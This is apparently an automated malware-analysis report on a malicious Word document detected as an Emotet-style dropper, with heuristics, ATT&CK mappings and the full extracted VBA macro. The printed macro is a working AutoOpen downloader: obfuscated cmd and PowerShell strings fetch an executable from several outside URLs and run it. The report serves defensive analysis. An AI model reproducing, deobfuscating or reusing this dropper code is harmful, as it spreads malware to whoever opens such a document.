MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute obfuscated commands, including a call to 'Shell' which likely initiates the download and execution of a second-stage payload. The ClamAV detection name 'Doc.Dropper.Emooodldr-6691359-0' strongly suggests the Emooodldr family.
Heuristics 5
-
ClamAV: Doc.Dropper.Emooodldr-6691359-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emooodldr-6691359-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4084 bytes |
SHA-256: c5058d784a0e96a584bb2c5d88ca0ec2f598944acd062d32d7036bfe07a4ba4d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hdsOBAp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim pdYMEp()
ReDim pdYMEp(4)
pdYMEp(0) = 7
pdYMEp(1) = 6
pdYMEp(2) = 9
pdYMEp(3) = 115
Dim dmuXuF()
ReDim dmuXuF(4)
dmuXuF(0) = 288606196
dmuXuF(1) = 1796
dmuXuF(2) = 9059
dmuXuF(3) = 462895274
Dim dYkGf()
ReDim dYkGf(2)
dYkGf(0) = 256451975
dYkGf(1) = 21
Dim ijdbI()
ReDim ijdbI(4)
ijdbI(0) = 82
ijdbI(1) = 1208
ijdbI(2) = 3463
ijdbI(3) = 362
Dim nQoazG()
ReDim nQoazG(4)
nQoazG(0) = 956
nQoazG(1) = 56
nQoazG(2) = 10
nQoazG(3) = 373
Dim buEVpY()
ReDim buEVpY(2)
buEVpY(0) = 3816
buEVpY(1) = 73
Shell@ GEuwUIqwP + UwJBScQFJCkdRn + jDiXMVzHbJLa, Format(0)
Dim CBQXSF()
ReDim CBQXSF(2)
CBQXSF(0) = 49
CBQXSF(1) = 13
Dim KHZnJ()
ReDim KHZnJ(3)
KHZnJ(0) = 6
KHZnJ(1) = 5
KHZnJ(2) = 565
Dim TXEtFw()
ReDim TXEtFw(2)
TXEtFw(0) = 188182558
TXEtFw(1) = 710
End Sub
Attribute VB_Name = "pizBCaJRqDVj"
Function GEuwUIqwP()
On _
Error _
Resume _
Next
Dim SIbYi()
ReDim SIbYi(3)
SIbYi(0) = 2
SIbYi(1) = 6764
SIbYi(2) = 57
Dim SzlWU()
ReDim SzlWU(3)
SzlWU(0) = 466425254
SzlWU(1) = 2641
SzlWU(2) = 15
jTXXwLiVd = Format(Chr(15 + 3 + 10 + 0 + 71)) + "md /V^:ON/" + Format(Chr(10 + 2 + 7 + 0 + 48)) + Format(Chr(4 + 1 + 3 + 0 + 26)) + "s^e^t Q^3^d^A=^ ^ " + " ^ ^ ^ }}^{h" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^ta" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^};^k" + "aer^b^;vA^K^$ me^" + "tI-ek^ovnI^;)" + "vA^K^$ ,zZL^$(e^l^iFda^" + "o^ln^w^o^D^.pl^" + "q^$^{^yrt^{)R" + "W^b^$^ " + "ni^ ^z^Z^L^$(h" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "aer^of;'^e^x^e." + "^'^+a^JN^$+^'\^'+" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "i^l" + "b^u^p:vne^$=v^" + "AK$^;^'0^"
Dim djvcF()
ReDim djvcF(2)
djvcF(0) = 94
djvcF(1) = 156569568
Dim NQwlRQ()
ReDim NQwlRQ(4)
NQwlRQ(0) = 15
NQwlRQ(1) = 63
NQwlRQ(2) = 9
NQwlRQ(3) = 79
Dim XulBV()
ReDim XulBV(5)
XulBV(0) = 5921
XulBV(1) = 7
XulBV(2) = 9
XulBV(3) = 201
XulBV(4) = 4204
wmQOEW = "7^1^' =^ aJN$;)" + "^'@^'(ti^l^pS^.^'X/^mo" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "." + "n^i^s^e^mh" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "e^tari^w//:^p^t^t" + "h@j/^t^en^" + ".^s^s^e" + "n^l^l^e^w^tr^a//^:p^t^th@" + Format(Chr(10 + 2 + 7 + 0 + 48)) + "ox" + "X^Yh/m^o" + Format(Chr(15 + 3 + 10 + 0 + 71)) + ".^dnr" + "-e" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "n^aill^a//^:^p^tt^"
Dim JzRulf()
ReDim JzRulf(2)
JzRulf(0) = 1095
JzRulf(1) = 9876
Dim bTtnQF()
ReDim bTtnQF(3)
bTtnQF(0) = 4235
bTtnQF(1) = 238160540
bTtnQF(2) = 6
oEIzz = "h@1^H/r^f.ved-^s^p^pa.ru" + "e^t" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "enno" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "//" + "^:pt^th@B^o^l^ai" + "R^l^k/m^" + "o" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "^.^s^uwag//^:" + "p^tt^h^'=RW^b^$^;tn"
Dim BDiwFw()
ReDim BDiwFw(5)
BDiwFw(0) = 8918
BDiwFw(1) = 336020556
BDiwFw(2) = 480
BDiwFw(3) = 7436
BDiwFw(4) = 61
Dim TkIqZm()
ReDim TkIqZm(5)
TkIqZm(0) = 813
TkIqZm(1) = 3
TkIqZm(2) = 95
TkIqZm(3) = 353511012
TkIqZm(4) = 908
Dim ztmdn()
ReDim ztmdn(3)
ztmdn(0) = 69
ztmdn(1) = 3213
ztmdn(2) = 3445
Dim XWRYc()
ReDim XWRYc(5)
XWRYc(0) = 6789
XWRYc(1) = 188766924
XWRYc(2) = 271
XWRYc(3) = 59
XWRYc(4) = 638
HnZCmwS = "^eil" + Format(Chr(10 + 2 + 7 + 0 + 48)) + "beW^.^t^eN" + " ^t" + Format(Chr(15 + 3 + 10 + 0 + 71)) + "e^j^bo^-^w^en^=p" + "lq^$^ ^l^le^hsrew^op&&^f" + "^or /^L %^F ^in (^35^1;" + "^-1^;^0)^do ^set V" + "^P=!V^P!!Q^3^d^A:~%^F,1!&&i^" + "f %^F=^=^0 " + Format(Chr(15 + 3 + 10 + 0 + 71)) + "a^l^l %V^P:~^-3^5" + "^2%" + Format(Chr(4 + 1 + 3 + 0 + 26)) + ""
GEuwUIqwP = jTXXwLiVd + wmQOEW + oEIzz + HnZCmwS
Dim faEBXz()
ReDim faEBXz(4)
faEBXz(0) = 112
faEBXz(1) = 64533234
faEBXz(2) = 120
faEBXz(3) = 1970
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.